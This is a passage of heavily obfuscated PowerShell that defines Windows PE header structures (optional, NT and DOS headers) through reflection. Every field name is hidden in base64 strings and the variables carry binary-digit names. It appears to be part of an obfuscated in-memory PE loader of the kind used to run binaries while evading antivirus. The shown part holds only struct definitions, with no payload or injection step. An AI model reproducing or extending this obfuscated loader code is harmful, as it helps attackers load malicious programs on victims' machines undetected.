(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABlAHIARgBsAGEAZwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(104) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAdgBhAEEAbgBkAFMAaQB6AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(108) | Out-Null
# Sixteen IMAGE_DATA_DIRECTORY entries, 8 bytes apart at offsets 112-232. Decoded
# names in order: ExportTable, ImportTable, ResourceTable, ExceptionTable,
# CertificateTable, BaseRelocationTable, Debug, Architecture, GlobalPtr, TLSTable,
# LoadConfigTable, BoundImport, IAT, DelayImportDescriptor, CLRRuntimeHeader, Reserved.
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(112) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(120) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(128) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGMAZQBwAHQAaQBvAG4AVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(136) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBlAHIAdABpAGYAaQBjAGEAdABlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(144) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBSAGUAbABvAGMAYQB0AGkAbwBuAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(152) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(160) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQByAGMAaABpAHQAZQBjAHQAdQByAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(168) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwAUAB0AHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(176) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABMAFMAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(184) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABDAG8AbgBmAGkAZwBUAGEAYgBsAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(192) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAHUAbgBkAEkAbQBwAG8AcgB0AA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(200) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBBAFQA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(208) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAYQB5AEkAbQBwAG8AcgB0AEQAZQBzAGMAcgBpAHAAdABvAHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(216) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAFIAUgB1AG4AdABpAG0AZQBIAGUAYQBkAGUAcgA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(224) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAZQByAHYAZQBkAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(232) | Out-Null
# Finalize the struct and expose it as $Win32Types.IMAGE_OPTIONAL_HEADER64.
${01001111111000111} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value ${01001111111000111}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAEUAeABwAGwAaQBjAGkAdABMAGEAeQBvAHUAdAAsACAAUwBlAGEAbABlAGQALAAgAEIAZQBmAG8AcgBlAEYAaQBlAGwAZABJAG4AaQB0AA==')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATwBQAFQASQBPAE4AQQBMAF8ASABFAEEARABFAFIAMwAyAA=='))), ${01001001010001110}, [System.ValueType], 224)
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGcAaQBjAA=='))), ${10011000111111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(0) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(2) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEwAaQBuAGsAZQByAFYAZQByAHMAaQBvAG4A'))), [Byte], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(3) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(4) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBuAGkAdABpAGEAbABpAHoAZQBkAEQAYQB0AGEA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(8) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAVQBuAGkAbgBpAHQAaQBhAGwAaQB6AGUAZABEAGEAdABhAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(12) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARQBuAHQAcgB5AFAAbwBpAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(16) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYAQwBvAGQAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(20) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBPAGYARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(24) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAGEAZwBlAEIAYQBzAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(28) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGMAdABpAG8AbgBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(32) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBBAGwAaQBnAG4AbQBlAG4AdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(36) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(40) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(42) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(44) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAEkAbQBhAGcAZQBWAGUAcgBzAGkAbwBuAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(46) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(48) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFMAdQBiAHMAeQBzAHQAZQBtAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(50) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AMwAyAFYAZQByAHMAaQBvAG4AVgBhAGwAdQBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(52) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASQBtAGEAZwBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(56) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAZABlAHIAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(60) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGUAYwBrAFMAdQBtAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(64) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB1AGIAcwB5AHMAdABlAG0A'))), ${01011100100100011}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(68) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), ${01100101010001010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(70) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAFIAZQBzAGUAcgB2AGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(72) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUwB0AGEAYwBrAEMAbwBtAG0AaQB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(76) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABSAGUAcwBlAHIAdgBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(80) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYASABlAGEAcABDAG8AbQBtAGkAdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(84) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABlAHIARgBsAGEAZwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(88) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAdgBhAEEAbgBkAFMAaQB6AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(92) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(96) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBtAHAAbwByAHQAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(104) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(112) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQB4AGMAZQBwAHQAaQBvAG4AVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(120) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBlAHIAdABpAGYAaQBjAGEAdABlAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(128) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQBSAGUAbABvAGMAYQB0AGkAbwBuAFQAYQBiAGwAZQA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(136) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(144) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQByAGMAaABpAHQAZQBjAHQAdQByAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(152) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwAUAB0AHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(160) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABMAFMAVABhAGIAbABlAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(168) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGEAZABDAG8AbgBmAGkAZwBUAGEAYgBsAGUA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(176) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAHUAbgBkAEkAbQBwAG8AcgB0AA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(184) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBBAFQA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(192) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAYQB5AEkAbQBwAG8AcgB0AEQAZQBzAGMAcgBpAHAAdABvAHIA'))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(200) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBMAFIAUgB1AG4AdABpAG0AZQBIAGUAYQBkAGUAcgA='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(208) | Out-Null
(${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAZQByAHYAZQBkAA=='))), ${00101010111001100}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))))).SetOffset(216) | Out-Null
${01100111011000001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value ${01100111011000001}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ASABFAEEARABFAFIAUwA2ADQA'))), ${01001001010001110}, [System.ValueType], 264)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGcAbgBhAHQAdQByAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBIAGUAYQBkAGUAcgA='))), ${01000101100110000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), ${01001111111000111}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01111010111100011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value ${01111010111100011}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ATgBUAF8ASABFAEEARABFAFIAUwAzADIA'))), ${01001001010001110}, [System.ValueType], 248)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGcAbgBhAHQAdQByAGUA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAGwAZQBIAGUAYQBkAGUAcgA='))), ${01000101100110000}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TwBwAHQAaQBvAG4AYQBsAEgAZQBhAGQAZQByAA=='))), ${01100111011000001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00001000110101010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value ${00001000110101010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARABPAFMAXwBIAEUAQQBEAEUAUgA='))), ${01001001010001110}, [System.ValueType], 64)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AYQBnAGkAYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAYgBsAHAA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcgBsAGMA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcABhAHIAaABkAHIA'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AaQBuAGEAbABsAG8AYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG0AYQB4AGEAbABsAG8AYwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHMAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHMAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcwB1AG0A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGkAcAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGMAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGwAZgBhAHIAbABjAA=='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AdgBuAG8A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
